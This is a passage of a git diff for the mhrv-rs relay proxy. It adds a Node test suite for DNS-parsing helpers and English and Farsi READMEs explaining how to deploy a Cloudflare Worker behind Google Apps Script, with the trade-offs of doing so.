-1. **Survives upstream outages**: if the user is on a network where raw.githubusercontent.com is temporarily unreachable but they can clone or ZIP this repo, they still have the deploy-ready file.
-2. **Pins what we tested against**: the relay protocol between `mhrv-rs` and the script is informal; upstream changes can silently break us. Keeping a snapshot here lets us diff and see if a spec drift is responsible for any reported breakage.
+- **`CodeFull.gs`** — superset of `Code.gs` that additionally proxies raw-TCP / UDP via `tunnel-node` (used by `mode: "full"`). **Maintained in this repo** — written for this Rust port and not present upstream. Deploy this if you want full-tunnel mode; details in the file's header comment.
 
-All credit for `Code.gs` goes to [@masterking32](https://github.com/masterking32) — we do not modify it. If you're using mhrv-rs, follow the upstream deploy instructions in the script's header comment. The only edit **you** must make is the `AUTH_KEY` constant — set it to a strong secret and reuse that exact string in your `mhrv-rs` config.
+- **`Code.cfw.gs`** — Apps Script becomes a thin auth+forward layer; the actual outbound fetch happens on a Cloudflare Worker you also deploy ([`assets/cloudflare/`](../cloudflare/)). **Derivative work — not unmodified upstream.** The pattern of forwarding through a Cloudflare Worker came from [denuitt1/mhr-cfw](https://github.com/denuitt1/mhr-cfw); this file inherits hardening from `Code.gs` (decoy-on-bad-auth, fail-closed sentinels) and adds chunked batch forwarding (`Promise.all` on the Worker side, `ceil(N/40)` GAS calls per batch) that the upstream `mhr-cfw` does not have. Trade-offs: lower per-call latency, but worse long-form YouTube playback and no fix for Cloudflare anti-bot challenges. Read [`assets/cloudflare/README.md`](../cloudflare/README.md) before choosing this one.
+
+## What you must edit before deploying
+
+For every variant: change `AUTH_KEY` from its placeholder to a strong secret, and use that same string in your `mhrv-rs` config's `auth_key`. `Code.cfw.gs` additionally requires setting `WORKER_URL` to your deployed Cloudflare Worker URL; `CodeFull.gs` additionally requires `TUNNEL_SERVER_URL` and `TUNNEL_AUTH_KEY` for the tunnel-node leg.
diff --git a/assets/apps_script/tests/edge_dns_test.js b/assets/apps_script/tests/edge_dns_test.js
new file mode 100644
index 00000000..f59c7576
--- /dev/null
+++ b/assets/apps_script/tests/edge_dns_test.js
@@ -0,0 +1,212 @@
+// Pure-JS sanity tests for the edge DNS cache helpers in CodeFull.gs.
+//
+// Run from repo root:  node assets/apps_script/tests/edge_dns_test.js
+//
+// The tests extract the helpers that don't depend on the GAS runtime
+// (Utilities, CacheService, UrlFetchApp) and exercise them against
+// crafted DNS wire-format payloads. They catch the bugs most likely to
+// regress when editing the parser: txid handling, name-pointer
+// compression, TTL sign-extension, splice ordering with mixed batches.
+
+'use strict';
+
+const fs = require('fs');
+const path = require('path');
+
+const SRC = path.join(__dirname, '..', 'CodeFull.gs');
+const src = fs.readFileSync(SRC, 'utf8');
+
+// Pull the pure-JS helpers out of CodeFull.gs by name and evaluate them in
+// one shared function scope so cross-refs (_dnsMinTtl → _dnsSkipName) resolve.
+const NAMES = [
+  '_dnsSkipName',
+  '_dnsParseQuestion',
+  '_dnsMinTtl',
+  '_dnsRewriteTxid',
+  '_spliceTunnelResults',
+];
+let bundle = '';
+for (const name of NAMES) {
+  const re = new RegExp(`function ${name}\\b[\\s\\S]*?\\n\\}\\n`, 'g');   // lazy: ends at the first "}" alone at column 0
+  const m = src.match(re);
+  if (!m) throw new Error('helper not found in CodeFull.gs: ' + name);
+  bundle += m[0] + '\n';   // first match only
+}
+bundle += `return { ${NAMES.join(', ')} };`;   // expose every helper on one object
+// eslint-disable-next-line no-new-func
+const ctx = new Function(bundle)();
+
+let passed = 0;   // sections completed; reported in the final summary line
+function ok(label) { console.log(label ? '  ok ' + label : '  ok'); passed++; }
+function check(label, cond, detail) {   // on a falsy cond: print FAIL and exit 1
+  if (!cond) {
+    console.error('FAIL: ' + label + (detail ? ' — ' + detail : ''));
+    process.exit(1);
+  }
+}
+
+// --- 1. parse a query for example.com A ---
+const q1 = Buffer.from([
+  0x12, 0x34,                                               // txid
+  0x01, 0x00,                                               // flags: RD=1
+  0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,           // counts
+  0x07, 0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65,           // "example"
+  0x03, 0x63, 0x6f, 0x6d, 0x00,                             // "com" 0
+  0x00, 0x01, 0x00, 0x01,                                   // qtype=A, qclass=IN
+]);
+console.log('TEST 1 query parse');
+const r1 = ctx._dnsParseQuestion(q1);
+check('txid',  r1.txid  === 0x1234, r1 && r1.txid.toString(16));
+check('qname', r1.qname === 'example.com', r1 && r1.qname);
+check('qtype', r1.qtype === 1);
+ok();
+
+// --- 2. case-fold (DNS names are case-insensitive on the wire) ---
+const q2 = Buffer.from([
+  0xab, 0xcd, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x07, 0x45, 0x58, 0x41, 0x4d, 0x50, 0x4c, 0x45,           // "EXAMPLE"
+  0x03, 0x43, 0x4f, 0x4d, 0x00,                             // "COM" 0
+  0x00, 0x1c, 0x00, 0x01,                                   // qtype=AAAA(28)
+]);
+console.log('TEST 2 case-fold to lowercase');
+const r2 = ctx._dnsParseQuestion(q2);
+check('lowercased qname', r2.qname === 'example.com', r2 && r2.qname);
+check('qtype AAAA',       r2.qtype === 28);
+ok();
+
+// --- 3. txid rewrite preserves all other bytes ---
+console.log('TEST 3 txid rewrite is byte-identical except [0..1]');
+const rewritten = ctx._dnsRewriteTxid(q1, 0xdead);
+check('hi byte',    (rewritten[0] & 0xFF) === 0xde);
+check('lo byte',    (rewritten[1] & 0xFF) === 0xad);
+check('length',     rewritten.length === q1.length);
+for (let i = 2; i < q1.length; i++) {
+  check('byte ' + i + ' unchanged', (rewritten[i] & 0xFF) === q1[i]);
+}
+check('source not mutated (cache safety)',
+  q1[0] === 0x12 && q1[1] === 0x34, 'source bytes 0..1 = ' + q1[0] + ',' + q1[1]);
+ok();
+
+// --- 4. min-TTL extraction with answer name-pointer compression ---
+const reply4 = Buffer.from([
+  0x12, 0x34, 0x81, 0x80,
+  0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
+  0x07, 0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65,
+  0x03, 0x63, 0x6f, 0x6d, 0x00,
+  0x00, 0x01, 0x00, 0x01,
+  0xc0, 0x0c,                                               // pointer to QNAME
+  0x00, 0x01, 0x00, 0x01,
+  0x00, 0x00, 0x01, 0x2c,                                   // TTL=300
+  0x00, 0x04,
+  0x5d, 0xb8, 0xd8, 0x22,                                   // 93.184.216.34
+]);
+console.log('TEST 4 reply min-TTL (answer with pointer)');
+check('TTL=300', ctx._dnsMinTtl(reply4) === 300);
+ok();
+
+// --- 5. NXDOMAIN with SOA in authority — TTL comes from authority RR ---
+const soa = Buffer.from([
+  0x02, 0x6e, 0x73, 0x04, 0x74, 0x65, 0x73, 0x74, 0x00,     // mname "ns.test."
+  0x0a, 0x68, 0x6f, 0x73, 0x74, 0x6d, 0x61, 0x73, 0x74, 0x65, 0x72,
+  0x04, 0x74, 0x65, 0x73, 0x74, 0x00,                        // rname
+  0x00, 0x00, 0x00, 0x01,
+  0x00, 0x00, 0x00, 0x02,
+  0x00, 0x00, 0x00, 0x03,
+  0x00, 0x00, 0x00, 0x04,
+  0x00, 0x00, 0x00, 0x05,
+]);
+const nxHeader = Buffer.from([
+  0x12, 0x34, 0x81, 0x83,                                   // RCODE=3
+  0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
+  0x07, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6e, 0x67,           // "missing"
+  0x04, 0x74, 0x65, 0x73, 0x74, 0x00,                        // "test"
+  0x00, 0x01, 0x00, 0x01,
+]);
+const authRR = Buffer.concat([
+  Buffer.from([0xc0, 0x14]),                                 // pointer to "test"
+  Buffer.from([0x00, 0x06, 0x00, 0x01]),                    // SOA / IN
+  Buffer.from([0x00, 0x00, 0x00, 0x3c]),                    // TTL=60
+  Buffer.from([0x00, soa.length]),
+  soa,
+]);
+const nxReply = Buffer.concat([nxHeader, authRR]);
+console.log('TEST 5 NXDOMAIN: rcode + SOA TTL parse');
+check('rcode 3', (nxReply[3] & 0x0F) === 3);
+check('soa TTL 60', ctx._dnsMinTtl(nxReply) === 60);
+ok();
+
+// --- 6. malformed (truncated header) → null ---
+console.log('TEST 6 truncated input rejected');
+check('null', ctx._dnsParseQuestion(Buffer.from([0x00, 0x00, 0x01])) === null);
+ok();
+
+// --- 7. illegal pointer in question section → null ---
+const q7 = Buffer.from([
+  0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0xc0, 0x0c,                                               // illegal in question
+  0x00, 0x01, 0x00, 0x01,
+]);
+console.log('TEST 7 reject compression in question');
+check('null', ctx._dnsParseQuestion(q7) === null);
+ok();
+
+// --- 8. TTL with high bit set is clamped to 0 (RFC 2181 §8) ---
+// Build a minimal A reply where the answer's 4-byte TTL field is 0x80000000.
+const reply8 = Buffer.from([
+  0x12, 0x34, 0x81, 0x80,
+  0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
+  0x07, 0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65,
+  0x03, 0x63, 0x6f, 0x6d, 0x00,
+  0x00, 0x01, 0x00, 0x01,
+  0xc0, 0x0c,
+  0x00, 0x01, 0x00, 0x01,
+  0x80, 0x00, 0x00, 0x00,                                   // TTL with top bit set
+  0x00, 0x04,
+  0x01, 0x02, 0x03, 0x04,
+]);
+console.log('TEST 8 TTL with high bit → clamped to 0');
+const t8 = ctx._dnsMinTtl(reply8);
+check('TTL clamped to 0 (not negative, not 2^31+)', t8 === 0, 'got ' + t8);
+ok();
+
+// --- 9. splice: forwarded results land at original op indices ---
+console.log('TEST 9 splice into mixed-batch slots');
+// Simulate a 5-op batch where indices 1 and 3 were served locally as DNS
+// hits, indices 0/2/4 were forwarded as TCP ops.
+const allResults = new Array(5);
+allResults[1] = { sid: 'edns-cache-1', pkts: ['A'], eof: true };
+allResults[3] = { sid: 'edns-doh-3',   pkts: ['B'], eof: true };
+const forwardIdx = [0, 2, 4];
+const forwardedResults = [
+  { sid: 'tcp-0', d: 'X' },
+  { sid: 'tcp-2', d: 'Y' },
+  { sid: 'tcp-4', d: 'Z' },
+];
+const merged = ctx._spliceTunnelResults(forwardIdx, forwardedResults, allResults);
+check('slot 0 from tunnel', merged[0].sid === 'tcp-0');
+check('slot 1 from cache',  merged[1].sid === 'edns-cache-1');
+check('slot 2 from tunnel', merged[2].sid === 'tcp-2');
+check('slot 3 from doh',    merged[3].sid === 'edns-doh-3');
+check('slot 4 from tunnel', merged[4].sid === 'tcp-4');
+check('returns same array', merged === allResults);
+ok();
+
+// --- 10. splice when nothing is forwarded ---
+console.log('TEST 10 splice with empty forward list');
+const allDns = [{ sid: 'a' }, { sid: 'b' }];
+const result10 = ctx._spliceTunnelResults([], [], allDns);
+check('no mutation', result10[0].sid === 'a' && result10[1].sid === 'b');
+ok();
+
+// --- 11. splice when everything is forwarded ---
+console.log('TEST 11 splice with everything forwarded');
+const empty = new Array(3);
+const result11 = ctx._spliceTunnelResults(
+  [0, 1, 2],
+  [{ sid: 'x' }, { sid: 'y' }, { sid: 'z' }],
+  empty,
+);
+check('all filled', result11[0].sid === 'x' && result11[2].sid === 'z');
+ok();
+
+console.log('\n' + passed + ' tests passed');
diff --git a/assets/cloudflare/README.fa.md b/assets/cloudflare/README.fa.md
new file mode 100644
index 00000000..4b183940
--- /dev/null
+++ b/assets/cloudflare/README.fa.md
@@ -0,0 +1,110 @@
+<div dir="rtl">
+
+# خروجی Cloudflare Worker (پشتیبان جایگزین برای Apps Script)
+
+> *English: [README.md](README.md)*
+
+این پوشه یک **Cloudflare Worker** ارائه می‌کند که همراه با [`assets/apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs) شکل متفاوتی از حالت `apps_script` به شما می‌دهد:
+
+```
+mhrv-rs ──► Apps Script (Code.cfw.gs) ──► Cloudflare Worker ──► مقصد
+            ▲ فقط احراز هویت و فوروارد       ▲ گرفتن داده + base64
+```
+
+پشتیبان استاندارد ([`assets/apps_script/Code.gs`](../apps_script/Code.gs)) خودِ `Apps Script` کار `fetch` به مقصد را انجام می‌دهد. این نسخه‌ٔ جایگزین، `Apps Script` را به یک رلهٔ نازک تبدیل می‌کند و کارِ اصلی را به لبهٔ `Cloudflare` می‌سپارد. **خود `mhrv-rs` تغییر نمی‌کند** — همان پاکت `JSON` روی سیم، همان `mode: "apps_script"` در `config.json`، همان `script_id`. تنها تفاوت این است که `Apps Script` مستقر شدهٔ شما بعد از احراز هویت چه می‌کند.
+
+ایدهٔ اصلی: <https://github.com/denuitt1/mhr-cfw>. این کپی یک بررسی `AUTH_KEY` روی خود `Worker` اضافه می‌کند، رفتار «صفحهٔ تقلبی برای کلید نامعتبر» را از `Code.gs` به ارث می‌برد، و یک محافظ در برابر حلقه‌شدن دارد.
+
+## چه‌وقت ارزش راه‌اندازی دارد؟
+
+✅ مرور وب، باز کردن صفحات جدید، ترافیک گفتگومحور — به‌طور محسوسی سریع‌تر می‌شود. تأخیر هر تماس از کف ۲۵۰ تا ۵۰۰ میلی‌ثانیه‌ٔ `Apps Script` به ۱۰ تا ۵۰ میلی‌ثانیه‌ٔ لبهٔ `Cloudflare` کاهش می‌یابد.
+
+✅ تلگرام بلادرنگ — پیام‌های کوتاه و مکرر بیشترین سود را می‌برند.
+
+✅ شبکه‌هایی که در آن‌ها ابتدا سهمیهٔ **زمان اجرای `Apps Script`** (۹۰ دقیقه در روز برای حساب‌های مصرفی گوگل) تمام می‌شود، نه شمارش `URL fetch`. در این حالت `GAS` تقریباً هیچ زمانی صرف هر تماس نمی‌کند.
+
+❌ **امروز هیچ کاهشی در شمارش روزانهٔ `UrlFetchApp` به دست نمی‌آورید.** مسیر رلهٔ `HTTP` در `mhrv-rs` همیشه فقط یک پاکت تک‌آدرسی می‌فرستد و هیچ‌گاه شکل دسته‌ای `q: [...]` را تولید نمی‌کند، پس هر درخواست کاربر همچنان یک `UrlFetchApp` در `GAS` مصرف می‌کند — مستقل از اینکه کدام نسخهٔ `Code.gs` را مستقر کرده باشید. مسیر `Code.cfw.gs` به سمت `Worker` *قابلیت* پشتیبانی از دسته را دارد (قطعه‌بندی ۴۰‌تایی، پخش‌سازی روی `Worker` با `Promise.all`، هزینهٔ `ceil(N / 40)` به جای `N`)، ولی این شاخه از هیچ کلاینت موجودی فراخوانی نمی‌شود. **تا زمانی که `mhrv-rs` خودش `HTTP relay` را دسته‌بندی نکند، سقف روزانهٔ ~۲۰٬۰۰۰ مصرف نسبت به `Code.gs` تغییر نمی‌کند.** این پشتیبانی برای سازگاری آینده در کد نگه داشته شده — هزینه‌ای ندارد و روزی که کلاینتِ دسته‌بندی‌کننده برسد، خود به خود فعال می‌شود.
+
+❌ ویدیوهای طولانی یوتیوب — **بدتر** می‌شود، نه بهتر. `Apps Script` تا حدود ۶ دقیقه دیوار اجرا (`wall`) به ازای هر فراخوانی می‌دهد؛ `Cloudflare Workers` در ۳۰ ثانیه قطع می‌کنند. صخرهٔ `SABR` زودتر فرا می‌رسد. برای استفادهٔ یوتیوب‌محور، روی `Code.gs` بمانید.
+
+❌ سایت‌هایی که پشت ضدبات `Cloudflare` هستند (توییتر/`X`، `OpenAI`، …) — `IP` خروجی حالا داخل خود `Cloudflare` است، که ضدبات `Cloudflare` آن را به‌عنوان «درخواست داخلی `Worker`» انگشت‌نگاری می‌کند. اغلب **سختگیرانه‌تر** از `IP` گوگل برخورد می‌شود. این مشکلی جدا از عبور از `DPI` است و هیچ‌کدام از این دو نسخه آن را حل نمی‌کنند.
+
+❌ اگر/زمانی که `HTTP relay` دسته‌ای فعال شود، سقف ۳۰ ثانیه‌ٔ `Cloudflare` روی **کندترین آدرس در هر قطعه** اعمال خواهد شد، نه به‌ازای هر `URL` — یک مقصد قفل‌شده می‌تواند کل قطعهٔ ۴۰ آدرسی را به `timeout` بکشاند. تلاش مجدد تک‌به‌تک در `mhrv-rs` این را پوشش می‌دهد، اما تفاوت رفتاری نسبت به دیوار `per-URL` در `fetchAll` استانداردِ `Code.gs` است. (امروز بی‌اثر است چون کلاینت دسته نمی‌فرستد.)
+
+## راه‌اندازی
+
+سه رشتهٔ هم‌خوان نیاز دارید: یک `AUTH_KEY` که بین `worker.js`، `Code.cfw.gs` و `config.json` خود `mhrv-rs` مشترک است. یک رمز تصادفی قوی انتخاب کنید و در هر سه جا paste کنید.
+
+### ۱. استقرار `Worker`
+
+۱. وارد <https://dash.cloudflare.com/> شوید → **`Workers & Pages`** → **`Create`** → **`Hello World`** → **`Deploy`**.
+۲. روی **`Edit code`** بزنید، کد پیش‌فرض را پاک کنید و محتوای [`worker.js`](worker.js) را paste کنید.
+۳. ثابت `AUTH_KEY` در بالای فایل را به رمز قوی خودتان تغییر دهید.
+۴. روی **`Deploy`** بزنید. آدرس `*.workers.dev` را کپی کنید — در مرحلهٔ بعد لازم است.
+
+### ۲. استقرار `Apps Script`
+
+۱. وارد <https://script.google.com> با حساب گوگلتان شوید → **`New project`** → کد پیش‌فرض را پاک کنید.
+
+۲. محتوای [`../apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs) را paste کنید.
+
+۳. هر دو ثابت بالای فایل را تنظیم کنید:
+   - مقدار `AUTH_KEY` را همان رمزی بگذارید که در `worker.js` گذاشتید.
+   - مقدار `WORKER_URL` را آدرس کامل `https://…workers.dev` همان `Worker` که الان مستقر کردید بگذارید (حتماً با پیشوند `https://`).
+
+۴. از مسیر **`Deploy → New deployment → Web app`** استقرار را شروع کنید: مقدار `Execute as` را روی **`Me`** و `Who has access` را روی **`Anyone`** بگذارید.
+
+۵. سپس **`Deployment ID`** را کپی کنید.
+
+### ۳. اشاره دادن `mhrv-rs` به این `Apps Script`
+
+در `config.json` (یا از طریق فرم `UI`):
+
+```json
+{
+  "mode": "apps_script",
+  "script_id": "PASTE_DEPLOYMENT_ID_HERE",
+  "auth_key": "SAME_SECRET_AS_BOTH_FILES_ABOVE"
+}
+```
+
+تمام. `mhrv-rs` لازم نیست بداند `Cloudflare` در کار است؛ از نگاه او این `script_id` مثل هر `Deployment` دیگری رفتار می‌کند. اگر چند `Deployment` دارید (بعضی استاندارد، بعضی `CFW`)، می‌توانید همه را در `script_ids: [...]` بگذارید — `round-robin` و `parallel-relay` همچنان روی همه‌شان کار می‌کند.
+
+## چرا هر سه `AUTH_KEY` باید یکی باشند؟
+
+- **بین `mhrv-rs` و `Apps Script`**: جلوی این را می‌گیرد که هر `POST` تصادفی روی آدرس `*.googleusercontent.com` شما رله شود. درخواست‌هایی که این کلید را نداشته باشند، یک صفحهٔ `HTML` تقلبی می‌گیرند (به‌خاطر `DIAGNOSTIC_MODE = false` در `Code.cfw.gs`) و `Deployment` شما به‌جای یک تونل، شبیه یک پروژهٔ فراموش‌شده دیده می‌شود.
+- **بین `Apps Script` و `Worker`**: اگر آدرس `Worker` لو برود، جلوی این را می‌گیرد که به یک رلهٔ `HTTP` باز برای مهاجم تبدیل شود. بدون این بررسی، `Worker` شما برای هر کسی که `URL` را پیدا کند، قابل سوءاستفاده است. نسخهٔ بالادست `mhr-cfw` این بررسی را ندارد؛ این کپی آن را اضافه می‌کند.
+
+اگر می‌خواهید برای امنیت بیشتر روی هر بخش رمز جدا داشته باشید، `Code.cfw.gs` را ویرایش کنید تا یک `k` متفاوت از آن چیزی که از `mhrv-rs` می‌گیرد به `Worker` بفرستد. تنظیم تک‌رمز ساده‌ترین حالتِ درست است.
+
+## بررسی اینکه کار می‌کند
+
+همان روش پشتیبان استاندارد: <https://ipleak.net> را از طریق پروکسی باز کنید. باید یک `IP` متعلق به `Cloudflare` ببینید (چون `fetch` واقعی حالا از شبکهٔ `Cloudflare` خارج می‌شود)، نه یک `IP` متعلق به گوگل که با `Code.gs` می‌دیدید. اگر `IP` واقعی خودتان را ببینید، پروکسی استفاده نمی‌شود؛ اگر `IP` گوگل ببینید، اشتباهاً `Code.gs` را به‌جای `Code.cfw.gs` مستقر کرده‌اید.
+
+دکمهٔ **`Test`** در `UI` دسکتاپ همچنان کار می‌کند — یک درخواست `HEAD` از طریق هر `Apps Script Deployment` که تنظیم کرده‌اید رله می‌کند.
+
+## جدول مقایسه در یک نگاه
+
+| محور | `Code.gs` (استاندارد) | `Code.cfw.gs` (این نسخه) |
+|---|---|---|
+| کف تأخیر هر تماس | ۲۵۰–۵۰۰ میلی‌ثانیه (هاپ داخلی `GAS`) | ۱۰–۵۰ میلی‌ثانیه (لبهٔ `CF`) |
+| سهمیهٔ `UrlFetchApp` در روز، **آنچه `mhrv-rs` امروز می‌فرستد** | ۱ سهمیه به‌ازای هر درخواست | ۱ سهمیه به‌ازای هر درخواست — یکسان (`mhrv-rs` فقط پاکت تک‌آدرسی تولید می‌کند) |
+| سهمیهٔ `UrlFetchApp` در روز، **اگر کلاینتی در آینده دسته بفرستد** | تعداد `N` سهمیه (یکی برای هر آدرس از طریق `fetchAll`) | تعداد `ceil(N / 40)` سهمیه (قطعه‌بندی ۴۰‌تایی؛ پخش‌سازی روی `Worker` با `Promise.all`) |
+| سقف درخواست `Cloudflare Workers` در روز (پلن رایگان) | ندارد | ۱۰۰٬۰۰۰ — بسیار بالاتر از چیزی که `GAS` می‌تواند تغذیه‌اش کند؛ گلوگاه نیست |
+| سهمیهٔ زمان اجرای `Apps Script` در روز | ۹۰ دقیقه، اغلب گلوگاه | ۹۰ دقیقه، به‌ندرت گلوگاه |
+| دیوار اجرای هر فراخوانی | ~۶ دقیقه، به‌ازای هر آدرس | ۳۰ ثانیه، به‌ازای هر تماس (اگر دسته‌بندی فعال شود، به‌ازای هر قطعه) |
+| سقف اندازهٔ پاسخ | ~۵۰ مگابایت (مستندات `Apps Script`) | محدود به حافظهٔ `Worker` (۱۲۸ مگابایت در پلن رایگان)؛ در عمل با تبدیل `base64` چند ده مگابایت |
+| حروف بزرگ/کوچک هدرهای پاسخ | همان‌طور که مبدأ فرستاده | کاملاً کوچک می‌شود (`Headers.forEach` در `Workers` نرمال می‌کند). فقط برای ابزارهای پایین‌دستی که نام هدر را حساس به حروف مقایسه می‌کنند مهم است؛ `mhrv-rs` خود حساس به حروف نیست. |
+| پخش ویدیوی طولانی یوتیوب | قابل قبول (صخرهٔ ۶ دقیقه) | بدتر (صخرهٔ ۳۰ ثانیه) |
+| سرعت تلگرام / گفتگو | پایه | محسوساً بهتر |
+| ضدبات `Cloudflare` روی مقصد | یک `IP` دیتاسنتر | یک `IP` داخلی `Worker` (اغلب سخت‌گیرانه‌تر) |
+| کش پاسخ روی `Spreadsheet` | موجود (اختیاری) | در این نسخه نیست |
+| پیچیدگی استقرار | ۱ چیز برای نگه‌داری | ۲ چیز که باید همگام بمانند |
+
+اگر این مبادلات به نفع شماست، این نسخه را مستقر کنید. اگر نیست — یا حساب `Cloudflare` ندارید — روی `Code.gs` بمانید.
+
+## محدودیت مهم: این نسخه با `mode: "full"` کار نمی‌کند
+
+این فایل فقط مسیر **رلهٔ `HTTP`** (حالت‌های ۱ و ۲ در `CodeFull.gs`) را پورت می‌کند. عملیات تونل `TCP/UDP` خام (حالت‌های ۳ و ۴ در `CodeFull.gs` که برای `mode: "full"` و کاربری اپلیکیشن‌های موبایل مثل واتس‌اَپ روی اندروید لازم‌اند) در `Code.cfw.gs` پشتیبانی نمی‌شوند. اگر در حالت `full` هستید و `WhatsApp` کند است، این تغییر کمکی نمی‌کند — این مسئلهٔ متفاوتی است که نیاز به طراحی جداگانه دارد.
+
+</div>
diff --git a/assets/cloudflare/README.md b/assets/cloudflare/README.md
new file mode 100644
index 00000000..403fe81b
--- /dev/null
+++ b/assets/cloudflare/README.md
@@ -0,0 +1,97 @@
+# Cloudflare Worker exit (alternative Apps Script backend)
+
+> *فارسی: [README.fa.md](README.fa.md)*
+
+This directory ships a **Cloudflare Worker** that pairs with [`assets/apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs) to give you a different shape of `apps_script` mode:
+
+```
+mhrv-rs ──► Apps Script (Code.cfw.gs) ──► Cloudflare Worker ──► target
+            ▲ thin auth + forward          ▲ outbound fetch + base64
+```
+
+The standard backend (`assets/apps_script/Code.gs`) does the outbound fetch from inside Apps Script directly. This variant makes Apps Script a thin relay and pushes the actual fetch to Cloudflare's edge. **mhrv-rs itself is unchanged** — same JSON envelope on the wire, same `mode: "apps_script"` in `config.json`, same `script_id`. The only thing that's different is what your deployed Apps Script does after it authenticates the request.
+
+Original idea: <https://github.com/denuitt1/mhr-cfw>. This copy adds an `AUTH_KEY` check on the Worker, the decoy-on-bad-auth treatment from `Code.gs`, and a hop-loop guard.
+
+## When this is worth it
+
+✅ Browsing, page navigation, chat-style traffic — visibly snappier. Per-call latency drops from the ~250-500 ms Apps Script floor to ~10-50 ms at the CF edge.
+✅ Telegram realtime — small frequent messages benefit most.
+✅ Networks where the Apps Script *runtime* quota (90 min/day on consumer Google accounts) is what you hit before the URL-fetch count cap. GAS spends almost no time per call here.
+
+❌ **No `UrlFetchApp` daily-count relief today.** mhrv-rs's HTTP relay path emits a single-URL envelope per request, never the `q: [...]` batch shape, so each user request still consumes one GAS UrlFetchApp call regardless of which `Code.gs` variant is deployed. The `Code.cfw.gs` ↔ Worker path *is* batch-aware (chunks at 40, Worker fans out via `Promise.all`, costs `ceil(N / 40)` per batch instead of N), but that branch is unreachable from any shipping client. **Until/unless mhrv-rs grows HTTP-relay batching, the daily 20k-fetch ceiling is unchanged from `Code.gs`.** The ready batching support is left in place for forward compatibility — it costs nothing and goes live the day a batching client lands.
+❌ YouTube long-form video — gets **worse**, not better. Apps Script allows ~6 min wall per execution; CF Workers cap at 30 s. The SABR cliff arrives sooner. Stay on `Code.gs` for YouTube-heavy use.
+❌ Sites behind Cloudflare anti-bot (Twitter/X, OpenAI, etc.) — exit IP becomes a Workers IP, which CF's own anti-bot fingerprints as a worker-internal request. Often *stricter* than a Google IP. This is a separate problem from DPI bypass and neither variant fixes it.
+❌ When/if HTTP-relay batching ships, the 30 s wall would apply to **the slowest URL in each chunk**, not per-URL — a single hung target could drag a 40-URL chunk to timeout. mhrv-rs's existing per-item retry would absorb this, but it's a behavioral change vs the per-URL `fetchAll` wall under `Code.gs`. (Inert today since no batching client exists.)
+
+## Setup
+
+You need the same secret in three places: a single `AUTH_KEY` value shared between `worker.js`, `Code.cfw.gs`, and your `mhrv-rs` `config.json` (where the field is named `auth_key`). Pick a strong random secret once and paste it into all three.
+
+### 1. Deploy the Worker
+
+1. Open <https://dash.cloudflare.com/> → **Workers & Pages** → **Create** → **Hello World** → **Deploy**.
+2. Click **Edit code**, delete the template, and paste the contents of [`worker.js`](worker.js).
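+3. Change the `AUTH_KEY` constant near the top of the file to your strong secret. Until you do, the Worker deliberately answers every request with HTTP 500 (`configure AUTH_KEY in worker.js`).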
+4. **Deploy**. Copy the `*.workers.dev` URL — you'll need it next.
+
+### 2. Deploy the Apps Script
+
+1. Open <https://script.google.com> while signed into your Google account → **New project** → delete the default code.
+2. Paste the contents of [`../apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs).
+3. Set both constants at the top:
+   - `AUTH_KEY` — the same secret you set in `worker.js`.
+   - `WORKER_URL` — the full `https://…workers.dev` URL of the Worker you just deployed (must include the scheme).
+4. **Deploy → New deployment → Web app**: *Execute as* = **Me**, *Who has access* = **Anyone**.
+5. Copy the **Deployment ID**.
+
+### 3. Point mhrv-rs at the Apps Script
+
+In `config.json` (or via the UI's config form):
+
+```json
+{
+  "mode": "apps_script",
+  "script_id": "PASTE_DEPLOYMENT_ID_HERE",
+  "auth_key": "SAME_SECRET_AS_BOTH_FILES_ABOVE"
+}
+```
+
+That's it. mhrv-rs doesn't need to know Cloudflare exists; from its perspective, the `script_id` deployment behaves like any other. If you have multiple deployments (some plain, some CFW), `script_ids: [...]` round-robins across all of them and the parallel-relay fan-out still works.
+
+## Why three matching `AUTH_KEY`s
+
+- **mhrv-rs ↔ Apps Script**: prevents random POSTs to your `*.googleusercontent.com` deployment from being relayed. Probes that don't carry the key get the decoy HTML page (`DIAGNOSTIC_MODE = false` in `Code.cfw.gs`), so the deployment looks like a forgotten placeholder rather than a tunnel.
+- **Apps Script ↔ Worker**: prevents random POSTs to your `*.workers.dev` Worker from being relayed if the Worker URL ever leaks. Without this check the Worker becomes an open HTTP-relay for arbitrary attackers. The upstream `mhr-cfw` Worker omits it; this copy adds it back.
+
+If you want compartmentalization (different secret on each leg), edit `Code.cfw.gs` to send a different `k` to the Worker than the one it accepts from mhrv-rs. The single-secret setup is the simplest correct configuration.
+
+## Verifying it works
+
+Same procedure as the standard backend: open <https://ipleak.net> through the proxy. You should see a Cloudflare-owned IP (since the actual fetch now exits Cloudflare's network), not a Google-owned one as you would with `Code.gs`. If you see your real IP, the proxy isn't being used; if you see a Google IP, you deployed `Code.gs` instead of `Code.cfw.gs`.
+
+The `Test` button in the desktop UI still works — it does a HEAD relay through whichever Apps Script deployment you configured.
+
+## Trade-off table at a glance
+
+| Axis | `Code.gs` (standard) | `Code.cfw.gs` (this variant) |
+|---|---|---|
+| Per-call latency floor | ~250-500 ms (GAS internal hop) | ~10-50 ms (CF edge) |
+| Apps Script `UrlFetchApp`/day, **what mhrv-rs sends today** | 1 quota / request | 1 quota / request — same (mhrv-rs only emits single-URL envelopes) |
+| Apps Script `UrlFetchApp`/day, **if a future client batches** | N quota (one per URL via `fetchAll`) | `ceil(N / 40)` quota (chunks at 40, Worker fans out via `Promise.all`) |
+| CF Workers requests/day (free tier) | n/a | 100 000 — far above what GAS can feed it; not the binding ceiling |
+| Apps Script runtime/day | 90 min, often binding | 90 min, rarely binding |
